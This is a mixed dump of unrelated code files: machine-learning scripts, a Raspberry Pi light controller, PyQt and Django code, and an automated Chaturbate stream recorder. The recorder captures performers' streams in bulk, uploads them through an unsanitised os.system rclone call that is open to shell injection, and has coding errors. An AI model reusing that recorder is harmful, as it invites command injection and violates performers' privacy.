d)\n\n#시각화\n# import matplotlib.pyplot as plt\n# plt.plot(cumsum)\n# plt.grid()\n# plt.show()\n\npca = PCA(n_components= d , ) #차원축소\nx2 = pca.fit_transform(x)\nprint(x2.shape)\n# d : 331\n#(70000, 331)\n\n#1.1 데이터 전처리\nx_train, x_test, y_train, y_test = train_test_split(x2, y, train_size = 0.8, random_state = 55)\nprint(x_train.shape, x_test.shape) #(56000, 154) (14000, 154)\nprint(y_train.shape, y_test.shape) #(56000,) (14000,)\nx_train, x_val, y_train, y_val=train_test_split(x_train, y_train, train_size=0.8, random_state=55)\n\n# print(x_train.max)\n# print(x_train.min)\n\n#2. 모델링\nmodel = XGBClassifier(n_job = -1, use_label_encoder= False)\n\n#3. 컴파일, 훈련\nmodel.fit(x_train, y_train)\n\n#4. 
Evaluation, prediction\nacc = model.score(x_test, y_test)\nprint('acc : ', acc)\n\ny_pred = model.predict(x_test[:10])\nprint(y_pred)\nprint(y_test[:10])\n\n#DNN\n#(784, )\n# loss : [0.09116600453853607, 0.9779000282287598]\n# [7 2 1 0 4 1 4 9 5 9]\n\n#PCA 154\n# loss : [0.13378241658210754, 0.9748571515083313]\n# [9 4 5 3 8 8 8 1 6 4]\n\n#PCA 331\n","sub_path":"ml/m33_pca_mnist1_xgb.py","file_name":"m33_pca_mnist1_xgb.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"238802303","text":"#%%\nimport pandas as pd \nimport numpy as np \nimport os\nfrom sklearn.base import BaseEstimator,TransformerMixin\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestClassifier\nclass campaign_age_unknown_trans(BaseEstimator,TransformerMixin):\n    def fit(self,df,y=None):\n        return self\n    def transform(self,df):\n        df=df.replace(to_replace={\"unknown\":np.nan})\n        df.loc[(df['age']<0)|(df['age']>100),'age'] = np.nan\n        df['marital'] = df['marital'].replace(to_replace={\"sungle\":\"single\"})\n        df.loc[(df['pdays'] ==999) & (df['poutcome'] !='nonexistent'),'pdays'] = np.nan\n        q1,q3 = df['campaign'].quantile([0.25,0.75])\n        lower = q1 - 3*(q3-q1)\n        upper = q3 + 3*(q3-q1)\n        df.loc[(df['campaign']<lower)|(df['campaign']>upper),'campaign'] = np.nan\n        df.set_index('previous',inplace=True)\n        df['campaign'] = df['campaign'].interpolate('linear')\n        df.reset_index(inplace=True)\n        df = df.assign(contacts_daily=(df['campaign']/(df['pdays']+1)).values)\n        df.loc[(df['age']>=60)&(pd.isnull(df['job'])),'job']='retired'\n        return df\n\nclass fix_imbalance(BaseEstimator,TransformerMixin):\n    def fit(self,df,y=None):\n        return self \n    def transform(self,df):\n        self.class_priors_pos = (df['y'] == 'yes').sum()\n        self.class_priors_neg = (df['y'] == 'no').sum()\n        self.df_pos = df[df['y'] == 'yes']\n        self.df_neg = df[df['y'] == 'no']\n        self.df_pos_over = self.df_pos.sample(int(0.5*self.class_priors_neg), replace=True)\n        df = pd.concat([self.df_pos_over,self.df_neg])\n        return df\n\nclass encode_mix_std(BaseEstimator,TransformerMixin):\n    def fit(self,df,y=None):\n        return self \n    def transform(self,df):\n        num_list=['age','campaign','pdays','previous','emp.var.rate','cons.price.idx','cons.conf.idx','euribor3m','nr.employed','contacts_daily']\n        num_group=df[num_list]\n        num_imp=SimpleImputer(strategy='mean')\n        num_group=num_imp.fit_transform(num_group)\n        std_=StandardScaler()\n        num_group=std_.fit_transform(num_group)\n        df=df.drop(num_list,axis=1)\n        df['y']=df['y'].replace({'yes':True,'no':False})\n        encoder_columns=list(df.columns)[:-1]\n        one_hot_group=df[encoder_columns]\n        df=df.drop(encoder_columns,axis=1)\n        imp=SimpleImputer(strategy='most_frequent')\n        one_hot_group=imp.fit_transform(one_hot_group)\n        one_hot=OneHotEncoder(handle_unknown='ignore')\n        one_hot_group=one_hot.fit_transform(one_hot_group)\n        one_hot_group=one_hot_group.toarray()\n        train_label=df['y']\n        total_data=np.concatenate([num_group,one_hot_group],axis=1)\n        return total_data,train_label\n\n\nhandle_pipeline = Pipeline([\n    ('step1', campaign_age_unknown_trans()),\n    #
('step2', assign_educ_job_marital()),\n ('step2', fix_imbalance()),\n ('step3',encode_mix_std())\n ])\n\nstrat_train_set=pd.read_csv('./data/strat_train_set.csv',index_col=False)\nstrat_test_set=pd.read_csv('./data/strat_test_set.csv',index_col=False)\n\ntrain_set, train_label=handle_pipeline.fit_transform(strat_train_set)\n\n\nhandle_test_pipeline = Pipeline([\n ('step1', campaign_age_unknown_trans()),\n ('step2',encode_mix_std())\n ])\ntest_set,test_label=handle_test_pipeline.fit_transform(strat_test_set)\ny_true=test_label\n#%%\nclf = RandomForestClassifier(random_state = 42, n_jobs = -1)\nbest_clf = GridSearchCV(clf,scoring='roc_auc',cv=5,n_jobs=-1,\n param_grid={'n_estimators': [100,200,500]})\nbest_clf.fit(train_set,train_label)\nprint(\"Select best RandomForest model with n_estimators = {} with best_score={}\".format(\n best_clf.best_params_['n_estimators'],\n best_clf.best_score_))\nfor n in [1000,1500]:\n test_clf=RandomForestClassifier(random_state =42, n_jobs = -1,n_estimators=n)\n test_clf.fit(train_set,train_label)\n print(\"The avarage AUC_ROC of the best random forest from 5-fold CV on test data is\",\n roc_auc_score(y_true.tolist(),test_clf.predict(test_set).tolist()))\n#%%\nclf = LogisticRegression()\nbest_clf = GridSearchCV(clf,scoring='roc_auc',cv=5,n_jobs=-1,\n param_grid={'C': [0.001,0.01,0.1,1,10,100]})\nbest_clf.fit(train_set,train_label)\nprint(\"Select best Logistic Regression model with C = {} with best_score={}\".format(\n best_clf.best_params_['C'],\n best_clf.best_score_))\n\nfor c in [0.001,0.01,0.1,1,10,100]:\n test_clf=LogisticRegression(C=c)\n test_clf.fit(train_set,train_label)\n print(\"The avarage AUC_ROC of the best logistic regression with {} from 5-fold CV on test data is\".format(c),\n roc_auc_score(y_true.tolist(),test_clf.predict(test_set).tolist()))\n#%%\nclf=MLPClassifier(hidden_layer_sizes=(30,10),random_state=42,activation='logistic')\nbest_clf = GridSearchCV(clf,scoring='roc_auc',cv=5,n_jobs=-1,\n param_grid={'alpha': [0.02,0.05,0.07]})\nbest_clf.fit(train_set,train_label)\nprint(\"Select best neural network model with alpha = {} with best_score={}\".format(\n best_clf.best_params_['alpha'],\n best_clf.best_score_))\n#%%\nfor a in [0.05,0.08,0.1,0.12,0.5]:\n nn_clf=MLPClassifier(random_state = 42,activation='logistic',alpha=a,hidden_layer_sizes=(30,10))\n nn_clf.fit(train_set,train_label)\n print(\"The avarage AUC_ROC of the best nn and alpha={} from 5-fold CV on test data is\".format(a),\n roc_auc_score(y_true.tolist(),nn_clf.predict(test_set).tolist()))\n# %%\ntrain=pd.read_csv('./data/bank_marketing_train.csv')\ntest=pd.read_csv('./data/bank_marketing_test.csv')\n\nhandle_pipeline = Pipeline([\n ('step1', campaign_age_unknown_trans()),\n ('step2', fix_imbalance()),\n 
])\nchange1_test=campaign_age_unknown_trans()\ntrain=handle_pipeline.fit_transform(train)\ntest=change1_test.fit_transform(test)\n\nnum_list=['age','campaign','pdays','previous','emp.var.rate','cons.price.idx','cons.conf.idx','euribor3m','nr.employed','contacts_daily']\ntrain_num_group=train[num_list]\ntest_num_group=test[num_list]\nnum_imp=SimpleImputer(strategy='mean')\ntrain_num_group=num_imp.fit_transform(train_num_group)\ntest_num_group=num_imp.fit_transform(test_num_group)\nstd_=StandardScaler()\ntrain_num_group=std_.fit_transform(train_num_group)\ntest_num_group=std_.fit_transform(test_num_group)\n\ntrain=train.drop(num_list,axis=1)\ntest=test.drop(num_list,axis=1)\nencoder_columns=list(train.columns)[:-1]\none_hot_train=train[encoder_columns]\nimp=SimpleImputer(strategy='most_frequent')\none_hot_train=imp.fit_transform(one_hot_train)\none_hot_test=imp.transform(test)\none_hot=OneHotEncoder(handle_unknown='ignore')\none_hot_train=one_hot.fit_transform(one_hot_train)\none_hot_test=one_hot.transform(one_hot_test)\none_hot_train=one_hot_train.toarray()\none_hot_test=one_hot_test.toarray()\ntrain_data=np.concatenate([train_num_group,one_hot_train],axis=1)\ntest_data=np.concatenate([test_num_group,one_hot_test],axis=1)\ntrain_label=train['y'].replace({'yes':True,'no':False})\n\n\n# %%\nclf = LogisticRegression()\nbest_clf = GridSearchCV(clf,scoring='roc_auc',cv=5,n_jobs=-1,\n param_grid={'C': [0.001,0.01,0.1,1,10,100]})\nbest_clf.fit(train_data,train_label)\nprint(\"Select best Logistic Regression model with C = {} with best_score={}\".format(\n best_clf.best_params_['C'],\n best_clf.best_score_))\n\n# %%\nclf = LogisticRegression(C=1)\nclf.fit(train_data,train_label)\ntest_ans=clf.predict_proba(test_data)\nans=pd.DataFrame(test_ans,columns=['prob_False','prob_True'])\nans.to_csv('./data/ans.csv')\ntest_label_lr=clf.predict(test_data)\ntest_label_lr=pd.DataFrame(test_label_lr,columns=['label'])\ntest_label_lr.to_csv('./data/testlabel_lr.csv')\n# %%\n","sub_path":"individualproject/first_way_predict.py","file_name":"first_way_predict.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"607261956","text":"'''Setup and start a XmasBox instance.'''\nimport subprocess\nimport time\n\nimport xmasbox\nimport xmasbox.displays\nimport xmasbox.config\nimport xmasbox.inputs\nfrom xmasbox.cheer import CheerCommand\n\nimport lights.cli\nimport lights.colour.correction as lcc\nimport lights.action.effects as lae\n\n\nclass ColourFadeCommand(xmasbox.Command):\n '''Command to run ColourFadeEffect'''\n def __init__(self):\n super().__init__(\"Colour Fade\")\n self._effect = None\n\n def run(self, light_string):\n colour_names = [\"red\", \"green\", \"blue\"]\n colours = []\n for colour_name in colour_names:\n colours.append(lights.colour.from_name(colour_name))\n\n self._effect = lae.ColourFadeEffect(light_string, colours,\n cycle_time=10)\n self._effect.start()\n\n def stop(self):\n if self._effect is not None:\n self._effect.stop()\n\n\nclass RainbowCommand(xmasbox.Command):\n '''Command to create a rainbow effect.'''\n def __init__(self):\n super().__init__(\"Rainbow\")\n self._effect = None\n\n def run(self, light_string):\n colour_names = [\"red\", \"green\", \"blue\"]\n colours = []\n for colour_name in colour_names:\n colours.append(lights.colour.from_name(colour_name))\n\n self._effect = lae.GradientEffect(light_string, colours,\n cycle_time=10)\n self._effect.start()\n\n def stop(self):\n if 
self._effect is not None:\n self._effect.stop()\n\n\nclass ClearCommand(xmasbox.Command):\n '''Command to clear the string of lights.'''\n def __init__(self):\n super().__init__(\"Clear\")\n\n def run(self, light_string):\n light_string.clear()\n light_string.show()\n\n def stop(self):\n pass\n\nclass ShutdownCommand(xmasbox.Command):\n '''Command to shutdown the computer.'''\n def __init__(self):\n super().__init__(\"Shutdown\")\n\n def run(self, light_string):\n light_string.clear()\n light_string.show()\n subprocess.call(\"sudo shutdown -h now\", shell=True)\n\n def stop(self):\n pass\n\n\nclass RebootCommand(xmasbox.Command):\n '''Command to reboot the computer.'''\n def __init__(self):\n super().__init__(\"Reboot\")\n\n def run(self, light_string):\n light_string.clear()\n light_string.show()\n subprocess.call(\"sudo shutdown -r now\", shell=True)\n\n def stop(self):\n pass\n\n\ndef main():\n '''Initialise and run an XmasBox instance.'''\n # Get config file options\n config = xmasbox.config.get_config(\"config.ini\")\n\n # Get command line options\n parser = lights.cli.get_light_options()\n\n displays = [\"scroll_phat\", \"micro_dot_phat\"]\n parser.add_argument(\"-d\", \"--display\", type=str.lower,\n help=\"Select display: %s\" % \" \".join(displays),\n choices=displays)\n args = parser.parse_args()\n\n # Override config file options\n xmasbox.config.cli_override(config, args)\n\n # Get lights and display from options\n light_string = xmasbox.config.lights_from_config(config)\n\n # Adjust for RGB LED Brightness variations\n light_string = lcc.ColourTunerWrapper(light_string)\n\n # Add output\n command_output = xmasbox.config.get_output(config)\n\n # Setup Xmas Box\n box = xmasbox.XmasBox(light_string, command_output=command_output)\n\n fade_command = ColourFadeCommand()\n shutdown_command = ShutdownCommand()\n clear_command = ClearCommand()\n reboot_command = RebootCommand()\n rainbow_command = RainbowCommand()\n cheer_command = CheerCommand()\n box.add_command(fade_command)\n box.add_command(rainbow_command)\n box.add_command(cheer_command)\n box.add_command(clear_command)\n box.add_command(reboot_command)\n box.add_command(shutdown_command)\n\n # XXX Something is causing the command to not run properly on startup\n # I suspect it's something to do with timing, so wait a few seconds\n # before starting it.\n time.sleep(5)\n\n box.run_current()\n\n # Create input loop\n input_handler = xmasbox.inputs.ButtonInput(box)\n\n input_handler.loop()\n\nif __name__ == '__main__':\n main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"310526297","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nHADES\r\nDiálogo Grupos\r\n\r\nCreated on Wed Sep 9 14:27:24 2020\r\n\r\n__author__ = Pedro Biel\r\n__version__ = 0.0.0\r\n__email__ = pbiel@taimweser.com\r\n\"\"\"\r\n\r\n\r\nfrom PyQt5 import uic\r\nfrom PyQt5.QtWidgets import QAbstractScrollArea, QDialog\r\n\r\n# from dlg_grupos.controlador.cnt_grupos import CntGruposDialogo\r\n\r\n\r\nclass DlgGrupos(QDialog):\r\n \r\n def __init__(self, parent=None, df=None, model=None):\r\n \"\"\"\r\n Diálogo Grupos de la aplicación.\r\n \r\n Para pasar datos de QMainWindow a QDialog:\r\n https://stackoverflow.com/questions/14309703/passing-parameter-from-main-window-to-pop-up-qdialog-window\r\n \"\"\"\r\n \r\n QDialog.__init__(self, parent)\r\n uic.loadUi('dlg_grupos/vista/dlg_grupos.ui', self)\r\n \r\n self.df = df # 
self.v.df_grupos\r\n self.model = model\r\n \r\n # Widgets PyQt5.\r\n self.lbl_1 = self.label_1\r\n self.lbl_2 = self.label_2\r\n self.lbl_3 = self.label_3\r\n self.tbl = self.tableView\r\n self.btn_aceptar = self.pushButtonAceptar\r\n \r\n # Título de la ventana.\r\n self.setWindowTitle('Grupos')\r\n \r\n # Altura mínima de la ventana.\r\n self.setMinimumHeight(500)\r\n \r\n # Texto de etiquetas.\r\n self.lbl_1.setText(\r\n 'Indicar Grupo para cada Caso y Nombre correspondiente.'\r\n )\r\n self.lbl_2.setText(\r\n 'Casos y Nombres sin un Grupo asignado no se tendrán en cuenta.'\r\n )\r\n self.lbl_3.setText(\r\n 'Modificaciones de los datos en Caso y Nombre pueden influir en el \\\r\nresultado final.'\r\n )\r\n \r\n # Modelo de la tabla.\r\n self.tbl.setModel(self.model)\r\n # Ajusta el ancho de las columnas a los contenidos.\r\n self.tbl.setSizeAdjustPolicy(QAbstractScrollArea.AdjustToContents)\r\n self.tbl.resizeColumnsToContents()\r\n \r\n # Botones.\r\n self.btn_aceptar.setText('Aceptar cambios')\r\n self.btn_aceptar.setShortcut('Ctrl+A')\r\n self.btn_aceptar.setToolTip('Acepta los cambios en la tabla | Ctrl+A')\r\n \r\n # Instancias de clase.\r\n # self.cnt_grupos = CntGruposDialogo(self)\r\n \r\n # Eventos.\r\n self.btn_aceptar.clicked.connect(self.acepta_cambios)\r\n \r\n def acepta_cambios(self):\r\n \"\"\"\r\n Acepta los cambios realizados en la QTableView y cierra el diálogo.\r\n \"\"\"\r\n \r\n self.reject()\r\n \r\n print('\\ndf_grupos:')\r\n print(self.df)\r\n \r\n # def rechaza_cambios(self):\r\n # \"\"\"\r\n # Rechaza los cambios realizados en la QTableView y cierra el diálogo.\r\n # \"\"\"\r\n \r\n # self.tbl.setModel(self.model)\r\n \r\n # def get_df(self):\r\n # \"\"\"Getter del DataFrame modificado.\"\"\"\r\n \r\n # self.df = self.acepta_cambios()\r\n\r\n # return self.df\r\n \r\n\r\n","sub_path":"Hades_1/dlg_grupos/dlg_grupos.py","file_name":"dlg_grupos.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"291405902","text":"#! /usr/bin/python3.4\n\"\"\"\nThe script extracts entries\ncontaining particuar word you specified (e.g. 
\"Penelope\")\nfrom RepeatModeler output file\n\"\"\"\nfrom Bio import SeqIO\nimport sys\nfilename = sys.argv[1]\ntry:\n f = open(filename)\nexcept IOError:\n print('file not found')\nextracted_sequences = []\nrep_name = input(\"Type your repeat name > \")\nfor record in SeqIO.parse(f, 'fasta'):\n if rep_name in record.id:\n extracted_sequences.append(record)\noutput = open(rep_name + '_consens.fasta', 'w')\nSeqIO.write(extracted_sequences, output, 'fasta')\noutput.close()\nprint('Done!\\nFound %i %s sequences' %(len(extracted_sequences), rep_name))\n","sub_path":"GetYourRepeat.py","file_name":"GetYourRepeat.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"28341755","text":"import time, datetime, os, sys, requests, configparser, re, subprocess\n#os.system(\"pip3 install livestreamer bs4 lxml gevent streamlink\")\nfrom bs4 import BeautifulSoup\nif os.name == 'nt':\n import ctypes\n kernel32 = ctypes.windll.kernel32\n kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)\n slash = \"\\\\\"\nelse:\n slash = \"/\"\nfrom queue import Queue\nfrom streamlink import Streamlink\nfrom threading import Thread\n\nConfig = configparser.ConfigParser()\nConfig.read(sys.path[0] + \"/config/config.conf\")\nsave_directory = Config.get('paths', 'save_directory')\nwishlist = Config.get('paths', 'wishlist')\ninterval = int(Config.get('settings', 'checkInterval'))\ngenders = re.sub(' ', '', Config.get('settings', 'genders')).split(\",\")\ndirectory_structure = Config.get('paths', 'directory_structure').lower()\npostProcessingCommand = Config.get('settings', 'postProcessingCommand')\nusername = Config.get(\"login\", \"username\")\npassword = Config.get(\"login\", \"password\")\ntry:\n postProcessingThreads = int(Config.get('settings', 'postProcessingThreads'))\nexcept ValueError:\n pass\ncompleted_directory = Config.get('paths', 'completed_directory').lower()\n\ndef now():\n return '[' + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") + ']'\n\nrecording = []\nwanted = []\n\ndef login():\n s.headers = {\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n 'referer': 'https://chaturbate.com/',\n 'origin': 'https://chaturbate.com',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-US,en;q=0.8',\n 'cache-control': 'max-age=0',\n 'upgrade-insecure-requests': '1',\n 'content-type': 'application/x-www-form-urlencoded',\n }\n\n\n data = {'username': username, 'password': password, 'next': ''}\n result = s.get(\"https://chaturbate.com/\")\n soup = BeautifulSoup(result.text, \"html.parser\")\n data['csrfmiddlewaretoken'] = soup.find('input', {'name': 'csrfmiddlewaretoken'}).get('value')\n\n result = s.post('https://chaturbate.com/auth/login/?next=/', data=data, cookies=result.cookies)\n if not checkLogin(result):\n print('Login failed. 
Check that your username and password is set correctly in the configuration file.')\n exit()\n else:\n print('Logged in successfully.')\n\n\ndef checkLogin(result):\n soup = BeautifulSoup(result.text, \"html.parser\")\n if soup.find('div', {'id': 'user_information'}) is not None:\n return True\n else:\n return False\n\ndef startRecording(model):\n global postProcessingCommand\n global processingQueue\n try:\n result = requests.get('https://chaturbate.com/api/chatvideocontext/{}/'.format(model)).json()\n session = Streamlink()\n session.set_option('http-headers', \"referer=https://www.chaturbate.com/{}\".format(model))\n streams = session.streams(\"hlsvariant://{}\".format(result['hls_source'].rsplit('?')[0]))\n stream = streams[\"best\"]\n fd = stream.open()\n now = datetime.datetime.now()\n filePath = directory_structure.format(path=save_directory, model=model, gender=result['broadcaster_gender'],\n seconds=now.strftime(\"%S\"),\n minutes=now.strftime(\"%M\"), hour=now.strftime(\"%H\"),\n day=now.strftime(\"%d\"),\n month=now.strftime(\"%m\"), year=now.strftime(\"%Y\"))\n directory = filePath.rsplit(slash, 1)[0]+slash\n if not os.path.exists(directory):\n os.makedirs(directory)\n if model in recording: return\n with open(filePath, 'wb') as f:\n recording.append(model)\n while model in wanted:\n try:\n data = fd.read(1024)\n f.write(data)\n except:\n f.close()\n break\n if postProcessingCommand:\n processingQueue.put({'model':model, 'path':filePath, 'gender':gender})\n elif completed_directory:\n finishedDir = completed_directory.format(path=save_directory, model=model,\n gender=gender, seconds=now.strftime(\"%S\"),\n minutes=now.strftime(\"%M\"),hour=now.strftime(\"%H\"), day=now.strftime(\"%d\"),\n month=now.strftime(\"%m\"), year=now.strftime(\"%Y\"))\n\n if not os.path.exists(finishedDir):\n os.makedirs(finishedDir)\n os.rename(filePath, finishedDir+slash+filePath.rsplit[slash,1][0])\n except: \n pass\n finally:\n os.system('rclone move \"{}\" milo:milo/b/MFC/\"{}\"'.format(filePath,model))\n if model in recording:\n recording.remove(model)\ndef postProcess():\n global processingQueue\n global postProcessingCommand\n while True:\n while processingQueue.empty():\n time.sleep(1)\n parameters = processingQueue.get()\n model = parameters['model']\n path = parameters['path']\n filename = path.rsplit(slash, 1)[1]\n gender = parameters['gender']\n directory = path.rsplit(slash, 1)[0]+slash\n subprocess.run(postProcessingCommand.split() + [path, filename, directory, model, gender])\n\ndef getOnlineModels():\n online = []\n global wanted\n s = requests.session()\n for gender in genders:\n try:\n data = {'categories': gender, 'num': 127}\n result = requests.post(\"https://roomlister.stream.highwebmedia.com/session/start/\", data=data).json()\n length = len(result['rooms'])\n online.extend([m['username'].lower() for m in result['rooms']])\n data['key'] = result['key']\n while length == 127:\n result = requests.post(\"https://roomlister.stream.highwebmedia.com/session/next/\", data=data).json()\n length = len(result['rooms'])\n data['key'] = result['key']\n online.extend([m['username'].lower() for m in result['rooms']])\n except:\n break\n f = open(wishlist, 'r')\n wanted = list(set(f.readlines()))\n wanted = [m.strip('\\n').split('chaturbate.com/')[-1].lower().strip().replace('/', '') for m in wanted]\n #wantedModels = list(set(wanted).intersection(online).difference(recording))\n '''new method for building list - testing issue #19 yet again'''\n wantedModels = [m for m in (list(set(wanted))) if 
m in online and m not in recording]\n for theModel in wantedModels:\n thread = Thread(target=startRecording, args=(theModel,))\n thread.start()\n f.close()\n\n\nif __name__ == '__main__':\n s = requests.session()\n result = s.get('https://chaturbate.com/')\n if not checkLogin(result):\n login()\n AllowedGenders = ['female', 'male', 'trans', 'couple']\n for gender in genders:\n if gender.lower() not in AllowedGenders:\n print(gender, \"is not an acceptable gender. Options are as follows: female, male, trans, and couple.\")\n print(\"Please correct your config file.\")\n exit()\n genders = [a.lower()[0] for a in genders]\n print()\n if postProcessingCommand != \"\":\n processingQueue = Queue()\n postprocessingWorkers = []\n for i in range(0, postProcessingThreads):\n t = Thread(target=postProcess)\n postprocessingWorkers.append(t)\n t.start()\n sys.stdout.write(\"\\033[F\")\n while True:\n sys.stdout.write(\"\\033[K\")\n print( now(),\"{} model(s) are being recorded. Getting list of online models now\".format(len(recording)))\n sys.stdout.write(\"\\033[K\")\n print(\"The following models are being recorded: {}\".format(recording), end=\"\\r\")\n getOnlineModels()\n sys.stdout.write(\"\\033[F\")\n for i in range(interval, 0, -1):\n sys.stdout.write(\"\\033[K\")\n print(now(), \"{} model(s) are being recorded. Next check in {} seconds\".format(len(recording), i))\n sys.stdout.write(\"\\033[K\")\n print(\"The following models are being recorded: {}\".format(recording), end=\"\\r\")\n time.sleep(1)\n sys.stdout.write(\"\\033[F\")\n","sub_path":"ChaturbateRecorder.py","file_name":"ChaturbateRecorder.py","file_ext":"py","file_size_in_byte":8375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"624075217","text":"from django.conf.urls import patterns, url\n\nurlpatterns = patterns('platform_core.institutes.views',\n\n # Institute list\n url(r'$', 'institute_list', name=\"institute_list\"),\n\n # Insitute details\n url(r'(?P\\w+)/$', 'institute_details',\n name=\"institute_details\"),\n # Chapter details\n url(r'(?P\\w+)/(?P\\w+)/$', 'chapter_details',\n name=\"chapter_details\"),\n\n # Institute Admin \n # url(r'^institute_admin/', include('platform_core.institute_admin.urls')),\n)\n","sub_path":"platform_core/institutes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"536375231","text":"#coding:utf-8\n\"\"\"\n33. N-Queens\n\nDescription\n\nThe n-queens puzzle is the problem of placing n queens on an n×n chessboard such that no two queens attack each other.\nGiven an integer n, return all distinct solutions to the n-queens puzzle.\nEach solution contains a distinct board configuration of the n-queens' placement, where 'Q' and '.' 
both indicate a queen and an empty space respectively.\n\n\nExample 1:\n\n\tInput:1\n\tOutput:\n\t [[\"Q\"]]\n\n\nExample 2:\n\n\tInput:4\n\tOutput:\n\t[\n\t // Solution 1\n\t [\".Q..\",\n\t \"...Q\",\n\t \"Q...\",\n\t \"..Q.\"\n\t ],\n\t // Solution 2\n\t [\"..Q.\",\n\t \"Q...\",\n\t \"...Q\",\n\t \".Q..\"\n\t ]\n\t]\n\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param: n: The number of queens\n @return: All distinct solutions\n \"\"\"\n def solveNQueens(self, n):\n # write your code here\n if n==0:\n return 0\n ret=[]\n self.dfs(n, 0, ret)\n return ret\n \n def dfs(self, n, index, ret, temp=[]): \n if index==n:\n m = self.tomap(n, temp)\n ret.append(m)\n s=[]\n for i in range(index):\n s.append(temp[i]+(index-i))\n s.append(temp[i]-(index-i))\n for i in range(n):\n if i not in (s+temp):\n temp.append(i)\n self.dfs(n,index+1,ret,temp)\n temp.pop()\n \n def tomap(self, n, temp):\n m=[]\n for i in temp:\n line = \".\"*i+\"Q\"+\".\"*(n-i-1)\n m.append(line)\n return m ","sub_path":"lintcode刷题/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"247137852","text":"def chunks(l, n):\r\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]\r\n\r\n\r\nclass TableRow:\r\n def __init__(self, isHeader=False, rno=-1, elementsPerRow=9999999999):\r\n self.isHeader = isHeader\r\n self.elements = []\r\n self.rno = rno\r\n self.elementsPerRow = elementsPerRow\r\n\r\n def addElement(self, element):\r\n self.elements.append(element)\r\n\r\n def getHTML(self):\r\n html = ''\r\n for elements in chunks(self.elements, self.elementsPerRow):\r\n html += ''\r\n if self.rno >= 0:\r\n html += '' + str(self.rno) + ''\r\n html += ''\r\n for e in elements:\r\n if self.isHeader or e.isHeader:\r\n elTag = 'th'\r\n else:\r\n elTag = 'td'\r\n html += '<%s>' % elTag + e.getHTML() + '' % elTag\r\n html += '\\n'\r\n return html\r\n","sub_path":"src/TableRow.py","file_name":"TableRow.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"475515323","text":"import datetime\n\nfrom django.utils import timezone\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\n\nfrom polls.models import Question\n\ndef create_question(question_text, days):\n\t\"\"\" Create a question with the given text, published the given\n\t\tnumber of days offset to now (negative for past publication dates,\n\t\tpositive for yet-to-publish questions) \"\"\"\n\ttime = timezone.now() + datetime.timedelta(days=days)\n\treturn Question.objects.create(question_text=question_text, pub_date=time)\n\nclass QuestionViewTests (TestCase):\n\tdef test_index_view_with_no_questions(self):\n\t\t\"\"\" If no questions exist, a msg should be displayed \"\"\"\n\t\tresponse = self.client.get(reverse('polls:index'))\n\t\tself.assertEqual(response.status_code, 200)\n\t\tself.assertContains(response, \"No polls are available.\")\n\t\tself.assertQuerysetEqual(response.context['latest_question_list'], [])\n\n\tdef test_index_view_with_future_question_and_past_question(self):\n\t\t\"\"\"\n\t\tEven if both past & future questions exist, only past questions should be displayed.\n\t\t\"\"\"\n\t\tcreate_question(question_text=\"Past question.\", days=-30)\n\t\tcreate_question(question_text=\"Future question\", days=30)\n\t\tresponse = 
self.client.get(reverse('polls:index'))\n\t\tself.assertQuerysetEqual(\n\t\t\tresponse.context['latest_question_list'],\n\t\t\t['']\n\t\t)\n\n\tdef test_index_view_with_two_past_question(self):\n\t\t\"\"\"\n\t\tThe questions index page should display multiple questions.\n\t\t\"\"\"\n\t\tcreate_question(question_text=\"Past question 1.\", days=-30)\n\t\tcreate_question(question_text=\"Past question 2.\", days=-5)\n\t\tresponse = self.client.get(reverse('polls:index'))\n\t\tself.assertQuerysetEqual(\n\t\t\tresponse.context['latest_question_list'],\n\t\t\t['', '']\n\t\t)\n\nclass QuestionMethodTests (TestCase):\n\tdef test_was_published_recently_with_future_question(self):\n\t\t\"\"\" was_published_recently() should return False for questions \n\t\t\twith pub_date in the future \"\"\"\n\t\ttime = timezone.now() + datetime.timedelta(days=30)\n\t\tfuture_question = Question(pub_date=time)\n\t\tself.assertEqual(future_question.was_published_recently(), False)\n\n\tdef test_was_published_with_old_question(self):\n\t\t\"\"\" was_published_recently() should return False for questions\n\t\t\twhose pub_date is older than a day \"\"\"\n\t\ttime = timezone.now() - datetime.timedelta(days=30)\n\t\told_question = 